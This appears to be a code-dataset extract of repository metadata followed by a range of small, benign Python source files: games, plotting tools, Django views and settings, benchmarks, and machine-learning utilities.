blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
687052a1711a288135716995285386d0849b8c02 | c89ffb9eff94c3d17a87edaaeb7e8d5383cff249 | /test.py | 2f14abf7e4c51fdc9437960d7046e14e6da0b018 | [] | no_license | LukeMiles49/Buzz-Words | d9eb95377c76249db135e03dfe2440aeef2adbab | a53e745554ea0e5e2a2434a5c22bf2e8549e8b1a | refs/heads/main | 2023-03-06T20:22:27.058995 | 2021-02-28T00:27:55 | 2021-02-28T00:27:55 | 342,924,361 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer
# initialize tokenizer and model from pretrained GPT2 model
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
model = GPT2LMHeadModel.from_pretrained('gpt2')
def predict(input):
inputs = tokenizer.encode(input, return_tensors='pt')
outputs = model.generate(inputs, max_length=200, do_sample=True)
return tokenizer.decode(outputs[0], skip_special_tokens=True)
print(predict("Hello, "))
| [
"luke.49@live.co.uk"
] | luke.49@live.co.uk |
77936d27233ecb6692cf71a0edc03f93a9bed8ae | 50dd2a43daa8316fc11e0c176b5872738fcc5dde | /Learning/130_Fluent_Python/fp2-utf8/bloccode/example 13-14.py | 98a7540674b5e587a7df1e47f5cf78c41d0e53e3 | [] | no_license | FrenchBear/Python | 58204d368e3e72071eef298ff00d06ff51bd7914 | b41ab4b6a59ee9e145ef2cd887a5fe306973962b | refs/heads/master | 2023-08-31T18:43:37.792427 | 2023-08-26T15:53:20 | 2023-08-26T15:53:20 | 124,466,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # Example 13-14. typing.SupportsComplex protocol source code
@runtime_checkable
class SupportsComplex(Protocol):
"""An ABC with one abstract method __complex__."""
__slots__ = ()
@abstractmethod
def __complex__(self) -> complex:
pass
| [
"FrenchBear38@outlook.com"
] | FrenchBear38@outlook.com |
6558b05697dcd764faf069be18b8ccd43daaab96 | 1f55df5c958331d0a548e1c0223fbaad4eff17bc | /readFromFile.py | 8cc5c3746013fef2d18b5d78cce8028f4546cace | [
"MIT"
] | permissive | aero-error/DS18B20_10x10_Array | 24b0b166b8eb19c018bfe833091e4a978a959da2 | 527b14e128b7e22e5d1130ab5ce4fa2b4becf6bd | refs/heads/master | 2020-09-12T21:23:13.088481 | 2020-04-11T02:28:22 | 2020-04-11T02:28:22 | 222,560,396 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # Michael Gromski
# This program reads data from a text file and converts it to a useful form and makes a contour plot
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
import matplotlib
file_name = input("Enter the name of the file you want to read from: ")
fvar = open(file_name,"r") # opens file
dataList = []
data = []
for line in fvar: # reads line by line and creates a nested list #Reads Data from file and converts it to a usable nested list
line = line.split()
dataList.append(line)
for i in range(0, len(dataList)): # converts all values to floats
data.append([])
for j in range(0,len(dataList[i])):
b = float(dataList[i][j])
data[i].append(b)
zPlots = []
for list in data: # Converts the nested list into a format that can be used for contour plots
i = 0
j = 0
frame = [[0 for x in range(10)] for y in range(10)]
for elem in list:
frame[i][j] = elem
if j == 9:
j = 0
i += 1
else:
j += 1
zPlots.append(frame)
a = 0
b = 5 #set frame you want to see here
matplotlib.style.use('default') # Creates Contour plot
fig = plt.figure()
ax = fig.add_subplot(111)
u = np.linspace(0,9,10)
x, y = np. meshgrid(u,u)
breaks = np.linspace(-1,1,10)
z = zPlots[b]
levels = [20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50]
ax.contourf(x,y,z,levels = levels, cmap='RdBu_r')#cm.Greys_r
cp = ax.contourf(x,y,z,levels=levels) # Color Bar
cb = fig.colorbar(cp)
cb.set_label('Temperature in Celsius')
plt.xlabel('Inches')
plt.ylabel('Inches')
plt.title('Thermal map of Aluminum Plate')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
ed70c705ec8d9478a07185a53de1b135ddca0511 | c4f0409c27bfde56af5426b378c0a6eea7b1d79f | /main.py | f5875c45d8e88f2aa573f16a9a5cf2b696ec9dc0 | [] | no_license | Rodrigofz/Tarea2Grafica | bdd792ea85f633dab7a3bcfe1e763b6eff7c6e3a | fe1393ea52c0cc5045f2fe3d1b205f9c59ca7bdb | refs/heads/master | 2021-09-17T11:28:02.275866 | 2018-07-01T17:30:54 | 2018-07-01T17:30:54 | 133,091,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,968 | py | #!/usr/bin/env python
from Resources.CC3501Utils import *
from View.Window import Window
from Model.Escena import Escena
from Model.Pelota import Pelota
from Model.Aro import Aro
import random
def main():
ancho = 800
alto = 600
init(ancho, alto, "Flappy dunk")
vista = Window()
items = []
pelota = Pelota(pos=Vector(100, 0.7 * alto))
items.append(pelota)
aro = Aro(pos=Vector(ancho - 400, 0.3 * alto))
items.append(aro)
aro = Aro(pos=Vector(ancho - 100, 0.5 * alto))
items.append(aro)
escena = Escena(ancho, alto)
score = 0
multiplicador = 2
#Sonido
jumpSound = pygame.mixer.Sound("Resources/jump1.wav")
jumpSound.set_volume(0.1)
run = True
pause = True
while run:
while pause:
vista.dibujar(items, escena, score, True)
pygame.display.flip()
pygame.time.wait(int(1000 / 30))
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_p:
pause = False
if event.type == QUIT:
pause = False
run = False
#Checkear input del teclado
for event in pygame.event.get():
if event.type == QUIT:
run = False
if event.type == KEYDOWN:
if event.key == K_SPACE:
jumpSound.play()
pelota.saltar()
if event.key == K_p:
pause = True
#Dibujar
vista.dibujar(items, escena, score)
#Chocar abajo
if pelota.pos.cartesianas()[1] <= 0:
print ('No puedes tocar el suelo :(')
run = False
#Chocar arriba
if pelota.pos.cartesianas()[1] >= alto:
print ('No puedes tocar el techo :(')
run = False
#Generar aro nuevo
if items[len(items)-1].generarNuevo(ancho):
nuevoAro = Aro(pos=Vector(ancho + 100, random.randint(100, alto - 130)))
items.append(nuevoAro)
#Sacar aros que ya no esten en pantalla
if items[1].pos.cartesianas()[0] <= -100:
items.pop(1)
#Pelota atraviesa aro limpiamente
if pelota.atravesoAroClean(items[1]):
items[1].sonido.play()
score += multiplicador
items[1].score += multiplicador
multiplicador += 1
#Pelota atraviesa aro tocando bordes
elif pelota.atravesoAroTocandoBordes(items[1]):
items[1].sonido.play()
score += 1
multiplicador = 2
items[1].score += 1
#Aro por debajo
if pelota.aroPorDebajo(items[1]):
pelota.chocarArriba()
#mover
for i in items:
i.mover()
pygame.display.flip()
pygame.time.wait(int(1000 / 30))
print('JUEGO TERMINADO')
pygame.quit()
main()
| [
"rodrigo.fuentes.z@ug.uchile.cl"
] | rodrigo.fuentes.z@ug.uchile.cl |
f3d83b764de388da70960460a57852996ffc4068 | addbc64d41d1975d82f5bd284ceb8c64c4e6d128 | /englishdictionary/dictionary/views.py | 25bd240be8c2edd09a15449da4650727e31de581 | [
"MIT"
] | permissive | iamansoni/Django-ProjectYard | dff8ff1926223426df0180f36d2e5d51101d9552 | bf9f7613aa98b1709fe7e3be917a1ae30f69e518 | refs/heads/master | 2023-05-09T11:50:47.846036 | 2021-05-14T12:34:03 | 2021-05-14T12:34:03 | 363,965,518 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | from django.shortcuts import render
from PyDictionary import PyDictionary
# Create your views here.
def index(request):
return render(request, 'index.html')
def word(request):
search = request.GET.get('search')
dictionary = PyDictionary()
meaning = dictionary.meaning(search)
synonyms = dictionary.synonym(search)
antonyms = dictionary.antonym(search)
context = {
'meaning': meaning,
'synonyms': synonyms,
'antonyms': antonyms
}
return render(request, 'word.html', context) | [
"amansoni162001@gmail.com"
] | amansoni162001@gmail.com |
352e1986d5a4bcac3ff903fd27c91bb9134f049b | a904e99110721719d9ca493fdb91679d09577b8d | /month04/project/day01-note/django-redis-4.10.0/tests/test_sqlite_herd.py | 8a053dfdee6155fadba6c8df1a27d172aada7270 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | chaofan-zheng/tedu-python-demo | 7c7c64a355e5380d1f8b6464affeddfde0d27be7 | abe983ddc52690f4726cf42cc6390cba815026d8 | refs/heads/main | 2023-03-12T05:17:34.596664 | 2021-02-27T08:33:31 | 2021-02-27T08:33:31 | 323,350,480 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | SECRET_KEY = "django_tests_secret_key"
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': [
'127.0.0.1:6379:5',
],
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"doesnotexist": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:56379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
}
},
'sample': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': '127.0.0.1:6379:1,127.0.0.1:6379:1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.HerdClient',
}
},
"with_prefix": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379?db=1",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.HerdClient",
},
"KEY_PREFIX": "test-prefix",
},
}
# TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
INSTALLED_APPS = (
"django.contrib.sessions",
)
| [
"417355570@qq.com"
] | 417355570@qq.com |
863e45c0783451eb725d9e5182ae2b3154aabdaf | c2634ebec1d4448e372d174f459c3cbc03fd1edc | /lib/node_modules/@stdlib/math/base/special/cosm1/benchmark/python/scipy/benchmark.py | 0f15a4ea4a9a905870399f1ccf3964f8e9ad5d86 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"SunPro",
"BSD-3-Clause",
"BSL-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | stdlib-js/stdlib | ede11aee78f08e4f78a0bb939cb0bc244850b55b | f10c6e7db1a2b15cdd2b6237dd0927466ebd7278 | refs/heads/develop | 2023-09-05T03:29:36.368208 | 2023-09-03T22:42:11 | 2023-09-03T22:42:11 | 54,614,238 | 4,163 | 230 | Apache-2.0 | 2023-09-13T21:26:07 | 2016-03-24T04:19:52 | JavaScript | UTF-8 | Python | false | false | 2,198 | py | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.special.cosm1."""
from __future__ import print_function
import timeit
NAME = "cosm1"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from scipy.special import cosm1; from random import random;"
stmt = "y = cosm1(4.0*random() - 2.0)"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::scipy::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " benchmark finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
| [
"kgryte@gmail.com"
] | kgryte@gmail.com |
7ab813efd20e559f09194ee7be752e1706a4e176 | f48a7bb8bfab291c5bfae6cb32e0afec3a39f32f | /example.py | 01285e4e6e83ca0505853dda6977da9227fee83c | [] | no_license | gravitino/cuda_tensorflow_op | ee784f2b877cecfbb09c845163a75188ea0c7c55 | 99250dd00221ce74cc239fcc2a9cf86f89008627 | refs/heads/master | 2021-01-25T05:09:02.934010 | 2017-06-06T10:50:28 | 2017-06-06T10:50:28 | 93,508,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | #!/usr/bin/env python
import tensorflow as tf
module = tf.load_op_library('./cuda_op_kernel.so')
# make sure you have tensorflow with GPU support
with tf.Session('') as sess:
ret = module.add_one([[1, 2], [3, 4]]).eval()
print(ret)
exit(0)
| [
"christian@iaimz105.Informatik.Uni-Mainz.DE"
] | christian@iaimz105.Informatik.Uni-Mainz.DE |
b33c0a3e1bd79d3a99d2baea18f3b07db8702741 | 422dd5d3c48a608b093cbfa92085e95a105a5752 | /students/WesleyM/Lesson09/get_news_threading.py | f7fbb7bae0a6e39d86f51d35eb3239abf6f498c7 | [] | no_license | UWPCE-PythonCert-ClassRepos/SP_Online_Course2_2018 | a2052fdecd187d7dd6dbe6f1387b4f7341623e93 | b1fea0309b3495b3e1dc167d7029bc9e4b6f00f1 | refs/heads/master | 2021-06-07T09:06:21.100330 | 2019-11-08T23:42:42 | 2019-11-08T23:42:42 | 130,731,872 | 4 | 70 | null | 2021-06-01T22:29:19 | 2018-04-23T17:24:22 | Python | UTF-8 | Python | false | false | 1,439 | py | import threading
import queue
import requests
WORD = "trump"
NEWS_API_KEY = '2d36b604aa1d49cfab25f38a286ae252'
base_url = 'https://newsapi.org/v1/'
def get_sources():
url = base_url + "sources"
params = {"language": "en",
"apiKey": NEWS_API_KEY}
resp = requests.get(url, params=params)
data = resp.json()
sources = [src['id'].strip() for src in data['sources']]
print("all the sources")
print(sources)
return sources
def get_articles(source):
url = base_url + "articles"
params = {"source": source,
"apiKey": NEWS_API_KEY,
"sortBy": "top"
}
print("requesting: ", source)
resp = requests.get(url, params=params)
if resp.status_code != 200:
print("something went wrong with {}".format(source))
print(resp)
print(resp.text)
return []
data = resp.json()
titles = [str(art['title']) + str(art['description'])
for art in data['articles']]
return titles
if __name__ == '__main__':
news_queue = queue.Queue()
def add_news_queue(*args):
news_queue.put(get_articles(*args))
sources = get_sources()
threads = []
for s in sources:
thread = threading.Thread(target=add_news_queue, args=(s,))
thread.start()
print("Thread %s started" %thread.name)
threads.append(thread)
for t in threads:
t.join()
| [
"wesmoy@uw.edu"
] | wesmoy@uw.edu |
33a3b799a3950bfde4f6cd3d7c033db3c2a57f6f | d77625d9d104022f83ab8fb5e2d7a7f5a24f5527 | /test.py | 194187e36d0d808745f23df7e35e45330a804a53 | [] | no_license | KonradRomanski/python_tasks | 9e4ab047f86c18b056eaa7debdd2e5427068c1d4 | 2bc59ee74430b85e8a473eeec02ca5a88f89c247 | refs/heads/master | 2022-09-30T06:18:37.309348 | 2020-06-08T11:38:28 | 2020-06-08T11:38:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | def main():
Students = {}
Tests = {}
N = int(input())
for i in range(N):
li = input().split()
if not li[0] in Students: Students[li[0]] = [0, 0]
for j in li[1:]:
newli = j.split(":")
if not newli[0] in Tests: Tests[newli[0]] = [0, 0]
Tests[newli[0]][0] += 1
Tests[newli[0]][1] += float(newli[1])
Students[li[0]][0] += 1
Students[li[0]][1] += float(newli[1])
for i in Students.items():
Students[i[0]] = Students[i[0]][1]/Students[i[0]][0]
for i in Tests.items():
Tests[i[0]] = Tests[i[0]][1]/Tests[i[0]][0]
# for i in Students.items(): print(i)
# for i in Tests.items(): print(i)
A = []
B = []
for i in Students.items():
A.append(i[0])
A.sort()
for i in Tests.items():
B.append(i[0])
B.sort()
for i in A:
print(i, Students[i])
for i in B:
print(i, Tests[i])
# print(A)
# print(B)
main()
# 4
# jan a:4 b:3
# artur d:2 a:7
# karol c:3.5 a:4 d:4 b:5
# sylwester eee:4
# def main():
# Z = {}
# lis = []
# N = int(input())
# for i in range(N):
# li = input().split()
# Z.append([li[0]])
#
# x = 0
# s = 0
#
# for j in li[1:]:
# x += 1
# a = j.split(":")
# print(a)
# s += int(a[1])
#
# a[0]
# Z[i].append(s/x)
# print(Z)
#
#
# main()
# main()
# class Student():
# def __init__(self, name, sr):
# name.self = name
# sr.self=sr
# def main()
# lis = []
# N = int(input())
# for i in range(N):
# li = input().split()
# temp = Student(li[0], )
# main() | [
"konrad.romanski4@gmail.com"
] | konrad.romanski4@gmail.com |
be6e9cd5df70141c29b35669beebe80bfc35281e | 863bea017a940375c38bec185c5e7da80b6d7191 | /handlers/peliculas/search.py | 72b5b6ddedc76945b7a262b57de35a043c643e3a | [] | no_license | Iagosevic/TopPelis | f4a8d52d75ccc602563c6d82aff4e9e68b90e478 | 10945003e5f0b35932c88beac9bd8ce263a83798 | refs/heads/main | 2023-05-04T22:49:12.001081 | 2021-05-21T16:23:31 | 2021-05-21T16:23:31 | 366,488,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | # coding: utf-8
# Busca una pelicula
#Librerias importadas
import webapp2
from webapp2_extras import jinja2
from model.pelicula import Pelicula
from webapp2_extras.users import users
class SearchPeliculaHandler(webapp2.RequestHandler):
#Datos que obtenemos
def get(self):
#Usuario conectado
usuario = users.get_current_user()
#Datos que pasamos a la vista
valores_plantilla = {
"usr" : usuario
}
# Instancia de jinja2 para cargar la vista
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("pelicula_search.html",**valores_plantilla))
#Datos que obtenemos del form para buscar
def post(self):
#Titulo de la pelicula a buscar
titulo = self.request.get("edTitulo", "")
#Buscamos la pelicula en el Datastore
pelicula = Pelicula.query(Pelicula.titulo == titulo).get()
#Usuario conectado
usuario = users.get_current_user()
#Datos que pasamos a la vista
valores_plantilla = {
"usr": usuario,
"pelicula": pelicula
}
#Si encuentra la pelicula
if pelicula:
#Nos envia al showcurrent de la pelicula buscada
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("pelicula_showcurrent.html", **valores_plantilla))
#Si no la encuentra
else:
#Nos muestra el error
return self.redirect("error")
#Indicamos el handler
app = webapp2.WSGIApplication([
('/peliculas/search', SearchPeliculaHandler)
], debug=True) | [
"noreply@github.com"
] | noreply@github.com |
880d293bb0d9e36550170f299a152867bfe0641e | 3fc642d275e7688b64919737dc3544646cc8730d | /skplot.py | cb7f2418db58a9f53b52821b48f943b9a1a02286 | [] | no_license | AshishShenoy/skplot | 4b1231d69889b3d421a4802be0131cfd37716b52 | 64e340520a0a879da541d89b0b87e553379027c1 | refs/heads/master | 2020-04-13T23:11:21.299184 | 2019-05-07T06:28:30 | 2019-05-07T06:28:30 | 163,499,706 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,834 | py | """
Created on Nov 02 18:27:52 2018
Project: Plotting a best fit line through a set of points.
This is a program which aims to plot a best-fit fit line through a scatter plot. The user may input
the co-ordinate points either a .csv file or may enter them manually one at a time. An example
result has been provided as well, on the Swedish Auto Insurance Dataset.
Developers: Ashish Shenoy, Rishith Bhowmick, Anantha Krishna
"""
# Importing libraries and functions
import pandas as pd
import matplotlib.pyplot as plt
# Initialising the graph variables
X, Y = [], []
xlabel = ""
ylabel = ""
title = ""
check = True
# A function to calculate 'm' in the equation y = mx + c using the deviation formula.
def calc_m (X, Y):
global check
sumX = sum(X)
sumY = sum(Y)
sumX2 = sum(i**2 for i in X)
XY = zip(X, Y)
sumXY = sum([x*y for x, y in XY])
n = len(X)
num = (sumX * sumY) - (n * sumXY)
den = (sumX)**2 - (n * sumX2)
try:
m = num/den
except ZeroDivisionError:
print("Please enter at least two points to plot first.")
check = False
else:
return m
# A function calculate 'c' in the equation y = mx + c using the intercept formula.
def calc_c (X, Y):
sumX = sum(X)
sumY = sum(Y)
sumX2 = sum(i**2 for i in X)
XY = zip(X, Y)
sumXY = sum([x*y for x, y in XY])
n = len(X)
num = (sumX * sumXY) - (sumY*sumX2)
den = (sumX**2) - (n * sumX2)
try:
c = num/den
except ZeroDivisionError:
pass
else:
return c
# A function for the use to maunally input the co-ordinate values.
def enter (x, y):
global X, Y
X.append(x)
Y.append(y)
# A function to plot the final graph.
def plot ():
global X, Y, check
m = calc_m(X, Y)
c = calc_c(X, Y)
if check:
plt.scatter(X, Y)
Y2 = [m * i + c for i in X]
plt.plot(X, Y2, color = 'r')
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
plt.show()
else:
check = True
print("\n\n")
# The Main part of the program,
def start():
print("Hi, this program can display a scatter plot and calculate the best fit line for that scatter plot " \
+ "and can create a graph showing both of them together. What would you like to do?")
print("Would you like to check out an example graph or would you like to input your own values?")
while True:
# Taking primary input from the user.
input1 = input("Enter the word 'example' to see the example graph, 'input' to create your own graph, "\
+ "or 'quit' if you want to exit the program: ")
if input1 == 'example':
# Reading and checking the example .csv file and storing the input and output variables in lists.
print("\n\nThe example graph shown here was produced from the sample dataset "\
+ "'Swedish Auto Insurance' which is a popular dataset for test values.")
print("This dataset contains 63 points,and each point details the number of "\
+ "insurance claims, and the total payment for all claims in thousands of "\
+ "Swedish Kronor. \n")
print("Here is a few lines of the dataset: \n")
w = pd.read_csv("Example.csv")
print(w.head(), "\n\n")
X2 = list(w["Number of Claims"].values)
Y2 = list(w["Total Payment"].values)
# Calculating the value of 'm' and 'c'.
m = calc_m(X2, Y2)
c = calc_c(X2, Y2)
# Plotting and displaying the scatter plot along with the best fit line.
print("Here is the graph of the best-fit line through the scatter plot. ")
plt.scatter(X2, Y2)
Y3 = [m * i + c for i in X2]
plt.plot(X2, Y3, color = 'r')
plt.xlabel("Number of claims")
plt.ylabel("Total Payment")
plt.title("Best-fit line and scatter plot")
plt.show()
print("\n")
continue
elif input1 == 'input':
# Taking secondary input from the user.
print("\nWould you like to input the points manually, one at a time, or would you like "\
+ "to input them through a .csv file? ")
input2 = input("Enter the word 'manual' to enter the points one at a time or 'csv' to "\
+ "enter them through a .csv file: ")
if input2 == 'manual':
# Instructing the user how to enter his/her own values manually.
print("\nEnter the X and corresponding Y values using the 'skplot.enter(X, Y)' function.")
print("To enter axis labels and titles, assign strings to xlabel, ylabel and title.")
print("Enter 'skplot.plot()' to display the graph after entering at least two points.")
break
elif input2 == 'csv':
# Recieving information from the user about the csv file.
csv_name = input("Enter the name of the csv file. Make sure it is in the same folder "\
+ "as the program: ")
x_col_name = input("Enter the name of the column containing the x values: ")
y_col_name = input("Enter the name of the column containing the y values: ")
# Reading and displaying a few lines of the csv file for the user to cross-check.
# Also handling all possible exceptions.
try:
w = pd.read_csv(csv_name)
print("Here is a preview of the csv file: \n")
print("\n", w.head(), "\n")
X = list(w[x_col_name].values)
Y = list(w[y_col_name].values)
except FileNotFoundError:
print("Error: " + csv_name + " is not found. \n")
continue
except KeyError:
print("Error: The X-column or Y-column name is incorrect. \n")
continue
except:
print("Unexpected Error. \n")
continue
print("\nTo input more co-ordinate points, use the 'skplot.enter(X, Y)' function.")
print("To enter axis labels and titles, assign strings to xlabel, ylabel and title.")
print("Enter 'skplot.plot()' to display the graph.")
break
else:
print("Unknown Command.")
continue
elif input1 == 'quit':
print("\nThank You for using our program! ")
break
else:
print("\nUnknown Command. \n")
continue | [
"ashish1shenoy@gmail.com"
] | ashish1shenoy@gmail.com |
169eefc9524590604288b8376f8c1f4d487c5c88 | fa78cd539cade5bba07e393c8d1184be58a6477a | /waste_collection/admin.py | a67fc1b7b28aa161d2dfddec85b68688bc9f5d76 | [] | no_license | iLabs-Makerere-University/tilenga-crm-django | e2c3e8777f012052a8cd77af5e06b9ae2180f805 | f764153e9c5877e20be1a1c1459de9fcb2b9df07 | refs/heads/master | 2020-04-29T22:08:04.113720 | 2019-04-01T08:18:15 | 2019-04-01T08:18:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.contrib import admin
from . models import WasteManagementProcedure
class WasteManagementProcedureAdmin(admin.ModelAdmin):
pass
admin.site.register(WasteManagementProcedure, WasteManagementProcedureAdmin)
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
929169ddee7131e5d77a178db50fa36f3c20ccdb | eeebae33ee2da583b464bb675cb6c81119524635 | /fsdet/utils/env.py | 8a7a212881580a89aa54c059d7b25b66f452ff7a | [
"Apache-2.0"
] | permissive | rakshitsakhuja/fsodet-run | 1fe37c752ddc41b3b08cc6e706876edd0606372f | f663f701fb44915eb6de6e3bf8a9b5860db1f4c0 | refs/heads/master | 2023-04-10T23:08:58.718076 | 2021-04-25T09:33:58 | 2021-04-25T09:33:58 | 341,829,584 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,263 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import importlib
import importlib.util
import logging
import numpy as np
import os
import random
import sys
from datetime import datetime
import torch
__all__ = ["seed_all_rng"]
def seed_all_rng(seed=None):
"""
Set the random seed for the RNG in torch, numpy and python.
Args:
seed (int): if None, will use a strong random seed.
"""
if seed is None:
seed = (
os.getpid()
+ int(datetime.now().strftime("%S%f"))
+ int.from_bytes(os.urandom(2), "big")
)
logger = logging.getLogger(__name__)
logger.info("Using a generated random seed {}".format(seed))
np.random.seed(seed)
torch.set_rng_state(torch.manual_seed(seed).get_state())
random.seed(seed)
# from https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path
def _import_file(module_name, file_path, make_importable=False):
spec = importlib.util.spec_from_file_location(module_name, file_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
if make_importable:
sys.modules[module_name] = module
return module
def _configure_libraries():
"""
Configurations for some libraries.
"""
# An environment option to disable `import cv2` globally,
# in case it leads to negative performance impact
disable_cv2 = int(os.environ.get("FSDET_DISABLE_CV2", False))
if disable_cv2:
sys.modules["cv2"] = None
else:
# Disable opencl in opencv since its interaction with cuda often has negative effects
# This envvar is supported after OpenCV 3.4.0
os.environ["OPENCV_OPENCL_RUNTIME"] = "disabled"
try:
import cv2
if int(cv2.__version__.split(".")[0]) >= 3:
cv2.ocl.setUseOpenCL(False)
except ImportError:
pass
_ENV_SETUP_DONE = False
def setup_environment():
"""Perform environment setup work. The default setup is a no-op, but this
function allows the user to specify a Python source file or a module in
the $FSDET_ENV_MODULE environment variable, that performs
custom setup work that may be necessary to their computing environment.
"""
global _ENV_SETUP_DONE
if _ENV_SETUP_DONE:
return
_ENV_SETUP_DONE = True
_configure_libraries()
custom_module_path = os.environ.get("FSDET_ENV_MODULE")
if custom_module_path:
setup_custom_environment(custom_module_path)
else:
# The default setup is a no-op
pass
def setup_custom_environment(custom_module):
"""
Load custom environment setup by importing a Python source file or a
module, and run the setup function.
"""
if custom_module.endswith(".py"):
module = _import_file("fsdet.utils.env.custom_module", custom_module)
else:
module = importlib.import_module(custom_module)
assert hasattr(module, "setup_environment") and callable(module.setup_environment), (
"Custom environment module defined in {} does not have the "
"required callable attribute 'setup_environment'."
).format(custom_module)
module.setup_environment()
| [
"masterkidster@gmail.com"
] | masterkidster@gmail.com |
61cfe6f18ab635a11a0e052d6d4160784fee45a5 | 22425a720986a746ddc2250295821023f53b74ef | /lanparty/lanparty_server/controllers/__init__.py | d50bf5c90bc29160f52f69bf9157f8ec52bbb0d6 | [] | no_license | thehellnet/lanparty-server | bd877ad4693e27434d340116af25a3d7f661aa68 | 2cd64e650fed92faf4e586f2fce5f9fb23822126 | refs/heads/master | 2020-04-08T18:48:47.958466 | 2019-05-17T13:22:24 | 2019-05-17T13:22:24 | 159,626,137 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19 | py | from . import tool
| [
"sardylan@gmail.com"
] | sardylan@gmail.com |
5d1c155d585d3b0a1036f0568b04008eafae631a | 5ccd63bc0a51f6cbf8431395e69d263b88c3434d | /agents/policy_gradient/modules/generalized_onpolicy_loss.py | f72276336ffbfb188fb8f2fe5c2ebb405446b09d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-research/seed_rl | 12076a223365c700772e9e1ec5fdf6e6aa3dc67d | 0e1e0ac9178a670ad1e1463baed92020e88905ec | refs/heads/master | 2023-08-25T05:07:19.775923 | 2022-11-29T12:41:08 | 2022-11-29T12:41:08 | 215,027,338 | 818 | 164 | Apache-2.0 | 2023-01-16T11:48:01 | 2019-10-14T11:35:42 | Python | UTF-8 | Python | false | false | 11,465 | py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
